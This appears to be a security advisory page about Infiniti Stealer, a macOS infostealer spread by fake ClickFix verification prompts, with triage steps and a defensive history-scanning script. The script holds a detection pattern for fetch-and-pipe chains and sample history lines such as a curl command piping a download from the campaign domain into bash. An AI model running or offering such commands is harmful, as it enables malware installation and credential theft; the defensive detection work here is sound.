What happened
Malwarebytes documented a new macOS infostealer campaign it calls Infiniti Stealer. Instead of exploiting a software bug, the attackers use a ClickFix social-engineering flow: victims see a fake “verification” page and are told to paste a command into Terminal.
According to Malwarebytes, the command fetches a staged malware chain from update-check[.]com, then launches a payload compiled with Nuitka (Python-to-native binary packaging), which can make static analysis and detection harder.
The final payload is described as stealing browser credentials, Keychain data, wallet information, and developer secrets (for example .env data), then exfiltrating results to attacker infrastructure.
Why this matters
This attack pattern bypasses many users’ normal safety instincts because it looks like routine bot/human verification. The risk is high because the user runs the command themselves, so the browser download warnings people rely on never fire.
For teams that support macOS endpoints, this is also a reminder that modern infostealer operators are actively targeting Apple systems with delivery techniques that previously spread mostly on Windows.
How to check if you’re affected
Potentially affected systems/services
- Affected devices/models: macOS systems where users pasted unknown commands into Terminal from a website prompt.
- Browsers and credential stores on those devices (including Keychain and Chromium/Firefox profiles).
- Developer workstations with local plaintext secrets (for example .env files).
Concrete verification steps (10–30 minute triage)
Interview impacted users immediately
- Ask whether they executed a verification command in Terminal from a website.
- Preserve timestamps and visited URL history before cleanup.
Hunt for suspicious execution artifacts
- Review shell history and recent process execution for curl/bash/nohup chains.
- Check temporary paths and launch-agent persistence locations for unknown files.
Assume secret exposure and rotate credentials
- Reset passwords from a known-clean device.
- Revoke active sessions, API tokens, and SSH keys that may have been present on the host.
Scan and isolate affected endpoints
- Run endpoint scans and isolate hosts with suspicious findings.
- If confidence is low, perform full rebuild/re-enrollment of affected systems.
Block known campaign infrastructure and educate users
- Block update-check[.]com and related indicators from the Malwarebytes report.
- Reinforce policy: legitimate CAPTCHA flows never require pasting commands into Terminal.
Immediate defensive actions
- Send an org-wide warning about fake ClickFix/CAPTCHA Terminal prompts.
- Prioritize credential rotation for any user who executed unknown shell commands.
- Add detections for suspicious Terminal-based bootstrap chains on macOS.
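The hunt step under “Concrete verification steps” and the detection action above say what to look for (curl/bash/nohup chains in shell history, unknown files in launch-agent and temp paths) but not how. The script below is an added example written for this page; it is not from the Malwarebytes report or any vendor tool. It assumes zsh/bash history in the default locations, BSD or GNU find and grep, and a constructed sample history for the dry run. The campaign domain is the one the report gives (defanged there as update-check[.]com); the bootstrap-chain regex is a heuristic, and the URL path in the sample is a placeholder, not a real campaign path.

```shell
#!/bin/sh
# Added triage helper for the hunt step; not part of the Malwarebytes report or
# of any vendor tool. Assumes default zsh/bash history paths, BSD/GNU find and
# grep, and the constructed sample history below.

CAMPAIGN_DOMAIN='update-check.com'     # written as update-check[.]com in the report

# Shapes a ClickFix paste leaves in shell history: a fetch piped into a shell,
# a base64 decode piped into a shell, or a nohup-backgrounded stage (heuristic).
BOOTSTRAP_RE='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba|z)?sh|nohup[[:space:]]'

# scan_history FILE: print one "REASON<TAB>command" line per suspicious entry.
scan_history() {
    while IFS= read -r line || [ -n "$line" ]; do
        # zsh EXTENDED_HISTORY prefixes each entry with ": <epoch>:<secs>;"
        case "$line" in
            ": "[0-9]*";"*) cmd=${line#*;} ;;
            *)              cmd=$line ;;
        esac
        case "$cmd" in
            *"$CAMPAIGN_DOMAIN"*)
                printf 'CAMPAIGN_DOMAIN\t%s\n' "$cmd"
                continue ;;
        esac
        if printf '%s\n' "$cmd" | grep -Eq "$BOOTSTRAP_RE"; then
            printf 'BOOTSTRAP_CHAIN\t%s\n' "$cmd"
        fi
    done < "$1"
    return 0
}

# count_history_hits FILE: number of flagged entries, for scripting.
count_history_hits() {
    scan_history "$1" | wc -l | tr -d ' '
}

# list_recent DIR DAYS: regular files under DIR modified within DAYS days.
# Used for the launch-agent/daemon and temp-path sweep; silent if DIR is absent.
list_recent() {
    [ -d "$1" ] || return 0
    find "$1" -type f -mtime "-$2" 2>/dev/null
    return 0
}

# triage_host: run the sweep on a real Mac as the affected user
# (prefix with sudo to read /Library and other users' temp files).
triage_host() {
    for h in "$HOME/.zsh_history" "$HOME/.bash_history"; do
        if [ -f "$h" ]; then
            echo "== shell history: $h"
            scan_history "$h"
        fi
    done
    for d in "$HOME/Library/LaunchAgents" /Library/LaunchAgents \
             /Library/LaunchDaemons /tmp /private/var/tmp "${TMPDIR:-/tmp}"; do
        echo "== files changed in the last 7 days under $d"
        list_recent "$d" 7
    done
}

# write_sample_history FILE: constructed zsh history for a dry run (not victim
# data; the URL path is a placeholder, not a real campaign path).
write_sample_history() {
    cat > "$1" <<'EOF'
: 1700000000:0;ls -la ~/Projects
: 1700000001:0;git status
: 1700000002:0;curl -fsSL https://update-check.com/PLACEHOLDER | bash
: 1700000003:0;echo aGVsbG8= | base64 -d | sh
: 1700000004:0;nohup /tmp/.stage/run >/dev/null 2>&1 &
: 1700000005:0;brew update
EOF
}

if [ "${1:-}" = "--host" ]; then
    triage_host
else
    sample=$(mktemp)
    write_sample_history "$sample"
    scan_history "$sample"            # flags three of the six sample entries
    echo "flagged entries: $(count_history_hits "$sample")"
    rm -f "$sample"
fi
```

Run it with no arguments for the dry run against the constructed sample, or with `--host` on a suspect Mac to sweep the real history files, launch-agent directories and temp paths. A hit on the campaign domain is a strong indicator; a bootstrap-chain hit is a prompt for the interview and credential-rotation steps, since legitimate developer workflows occasionally pipe a fetch into a shell too.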
Sources
- https://www.malwarebytes.com/blog/threat-intel/2026/03/infiniti-stealer-a-new-macos-infostealer-using-clickfix-and-python-nuitka
- https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/
Bottom line
If a user pasted a website-provided command into Terminal, treat the Mac as potentially compromised, rotate exposed secrets, and investigate quickly. ClickFix-style social engineering is now a practical, repeatable macOS infection path.
